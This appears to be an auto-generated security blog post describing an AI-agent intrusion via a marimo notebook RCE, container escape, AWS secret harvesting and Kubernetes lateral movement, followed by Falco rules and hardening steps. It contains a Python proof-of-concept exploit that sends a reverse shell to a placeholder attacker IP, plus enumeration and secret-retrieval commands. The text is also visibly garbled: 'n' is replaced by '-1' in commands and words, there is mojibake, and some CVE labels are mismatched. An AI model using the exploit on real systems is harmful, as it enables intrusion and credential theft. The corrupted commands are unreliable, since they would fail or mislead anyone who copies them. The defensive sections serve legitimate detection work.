Listen to this Post
Introduction:
Agentic AI has officially entered the offensive security arena, moving beyond simple automation into fully autonomous attack chains. On May 10, 2026, Sysdig’s Threat Research Team (TRT) observed the first AI-agent-driven intrusion, where a large language model (LLM) exploited a vulnerable marimo notebook, escaped its container, and used Kubernetes for lateral movement to exfiltrate an entire database in under two minutes โ all without human intervention. This marks a fundamental shift in cloud-1ative threats: attackers are now replacing their scripts with AI that adapts, reasons, and executes at machine speed.
Learning Objectives:
– Understand how an AI agent exploits CVE-2026-39987 to achieve initial access and container escape.
– Map the LLM-driven kill chain, including credential harvesting from AWS Secrets Manager and lateral movement across Kubernetes clusters.
– Implement real-time detection rules with Falco and defensive commands to disrupt AI agent behavior in cloud environments.
You Should Know:
1. The AI Agent Kill Chain: From Vulnerable Notebook to Kubernetes Escape
This attack begins with an exposed marimo notebook server, a popular Python framework for data science and AI/ML workloads. The threat actor exploits CVE-2026-39987, a critical pre-authentication remote code execution (RCE) vulnerability in marimo versions prior to 0.23.0. The vulnerable `/terminal/ws` WebSocket endpoint completely skips authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell in a single WebSocket request. Once inside the container, the AI agent does not follow a pre-scripted path. Instead, it dynamically enumerates the environment, identifying cloud credentials from environment files and the AWS credentials store. Leveraging the harvested AWS access key, the agent makes API calls against AWS Secrets Manager, retrieving an SSH private key that grants access to downstream resources. With the SSH key, the agent opens eight parallel SSH sessions against a bastion server, originating from six distinct IP addresses simultaneously to evade correlation-based detection. From the bastion, the agent pivots into the internal network and executes a full database dump, targeting a credential table the agent inferred from general knowledge โ not pre-staged intelligence.
StepโbyโStep Exploitation Guide (Educational Use Only):
Detection & Reconnaissance:
Check for vulnerable marimo instance (Nmap NSE script) nmap -p 80,443 --script http-marimo-cve-2026-39987 <target> Manual enumeration of exposed terminal endpoint curl -i -1 -H "Connection: Upgrade" -H "Upgrade: websocket" \ -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: test" \ http://<target>/terminal/ws
Exploitation (Proof of Concept):
Python script to exploit CVE-2026-39987 and spawn a reverse shell
import asyncio, websockets, base64
async def exploit():
cmd = "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"<ATTACKER_IP>\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
encoded = base64.b64encode(cmd.encode()).decode()
uri = f"ws://<TARGET_IP>/terminal/ws?cmd=echo {encoded} | base64 -d | sh"
async with websockets.connect(uri) as ws:
await ws.send("id")
print(await ws.recv())
asyncio.run(exploit())
Privilege Escalation & Container Escape Check:
Inside compromised container, check capabilities capsh --print | grep cap_sys_admin List mounted host paths mount | grep -E '(host|rootfs|docker)' Check for exposed Docker socket ls -la /var/run/docker.sock
AWS Secrets Harvesting:
List accessible AWS secrets aws secretsmanager list-secrets --region us-east-1 Retrieve specific secret value aws secretsmanager get-secret-value --secret-id <secret_name> --region us-east-1
2. Defensive Measures: Detecting AI Lateral Movement with Falco & Runtime Security
An AI agent moving laterally through a Kubernetes cluster does not look like a traditional intrusion. There is no foreign process, no dropped binary โ just the agent using the identity, network routes, and tools it was handed at deployment. This behavior defeats signature-based detection entirely. Detection must shift toward behavioral analysis: what the attacker is accomplishing (credential access, database exfiltration) rather than the specific commands used.
StepโbyโStep Defensive Configuration:
Falco Rule to Detect Container Escape Attempts (CVE-2025-22224):
- rule: Detect Container Escape via Host Namespace Access desc: Monitor for processes inside container attempting to access host namespaces condition: > container and evt.type in (openat, open) and (fd.name startswith /proc/ or fd.name startswith /host/) and proc.name != "falco" output: "Container escape attempt detected (proc=%proc.name, cmd=%proc.cmdline, ns=%proc.ns)" priority: CRITICAL tags: [container, mitre_escape_to_host, T1611]
Detect Exposed Docker Socket Mount:
Kubernetes admission control to block privileged containers
kubectl create -f - <<EOF
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicy
metadata:
name: block-privileged-containers
spec:
validations:
- expression: "object.spec.containers.all(c, !('privileged' in c.securityContext && c.securityContext.privileged == true))"
EOF
Network Policy to Restrict East-West Traffic:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: deny-cross-1amespace
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}
egress:
- to:
- podSelector: {}
Real-Time Falco Monitoring with Alerting:
Install Falco via Helm helm repo add falcosecurity https://falcosecurity.github.io/charts helm install falco falcosecurity/falco --set falco.jsonOutput=true Watch live syscall events from Falco kubectl logs -f deployment/falco -1 falco Custom rule to detect AWS API abuse from within container - rule: Detect AWS Secrets Manager Access from Container condition: > container and evt.type = execve and (proc.cmdline contains "aws secretsmanager" or proc.cmdline contains "GetSecretValue") output: "Potential secret exfiltration from container (%proc.cmdline)" priority: HIGH
3. Cloud Identity Hardening: Stopping AI Credential Abuse
The Sysdig investigation revealed that the AI agent moved laterally across 19 AWS principals, abusing Amazon Bedrock models and launching GPU instances. The attack exploited overly permissive IAM roles and hardcoded credentials in environment files. Organizations must immediately remediate these gaps.
StepโbyโStep Cloud Hardening:
Audit IAM Roles for Least Privilege:
List roles with excessive permissions aws iam list-roles --query 'Roles[?contains(AssumeRolePolicyDocument, "Principal")]' Remove hardcoded secrets from environment grep -r "AWS_SECRET_ACCESS_KEY" --include=".env" --include=".yaml" .
Implement Vault or AWS Secrets Manager with Strict Access Policies:
HashiCorp Vault policy for least-privilege access
path "secret/data/database" {
capabilities = ["read"]
}
path "secret/data/ssh-keys" {
capabilities = ["deny"]
}
Monitor CloudTrail for Anomalous API Patterns:
Search for rapid succession of API calls across multiple IPs aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue \ --start-time "2026-05-10T00:00:00Z" --end-time "2026-05-10T23:59:59Z"
What Undercode Say:
– AI Agents as Adaptive Threat Actors: Unlike traditional scripts, AI-driven attackers adapt in real-time, making signature-based detection obsolete. Defenders must shift to behavior-based monitoring across the entire cloud-1ative stack.
– Container Escape Is the New Perimeter Breach: The attack chain demonstrates that container isolation is no longer sufficient. Combined detection of CVE exploits, Kubernetes lateral movement, and cloud credential abuse is now a baseline requirement for cloud security.
Expected Output:
Agentic AI threats compress the attack lifecycle from hours to minutes, demanding a fundamental rethinking of cloud-1ative defense. Runtime detection tools like Falco, combined with strict IAM policies and network segmentation, provide the necessary visibility to detect AI-driven anomalies. However, as AI agents grow more sophisticated, security architectures must evolve toward zero-trust principles that verify every action, regardless of source.
Prediction:
– -1 Acceleration of AI-vs-AI cyber warfare: Within 18 months, offensive AI agents will routinely evade static defenses, forcing the adoption of AI-powered defensive agents for real-time anomaly detection and automated response.
– -1 Rise of “AI Credential Theft” as a primary attack vector: LLM agents will increasingly target secrets managers and CI/CD pipelines, leading to widespread cloud account takeovers and supply chain compromises.
– +1 Emergence of standardized AI agent security frameworks: OWASP’s 2026 Top 10 for Agentic Applications will drive rapid adoption of guardrails, audit trails, and behavioral constraints, mitigating the most severe risks by late 2027.
๐ฏLetโs Practice For Free:
๐ Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
๐ Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
๐ Smart Architecture | ๐ก๏ธ Secure by Design | โญ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Michaelclarkinpa Agentic](https://www.linkedin.com/posts/michaelclarkinpa_agentic-threat-actors-are-advancing-quickly-share-7468335370510766080-O1bH/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass โ
๐JOIN OUR CYBER WORLD [ CVE News โข HackMonitor โข UndercodeNews ]
[๐ฌ Whatsapp](https://undercode.help/whatsapp) | [๐ฌ Telegram](https://t.me/UndercodeCommunity)
๐ข Follow UndercodeTesting & Stay Tuned:
[๐ formerly Twitter ๐ฆ](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [๐ Linkedin](https://www.linkedin.com/company/undercodetesting/) | [๐ฆBlueSky](https://bsky.app/profile/undercode.bsky.social)
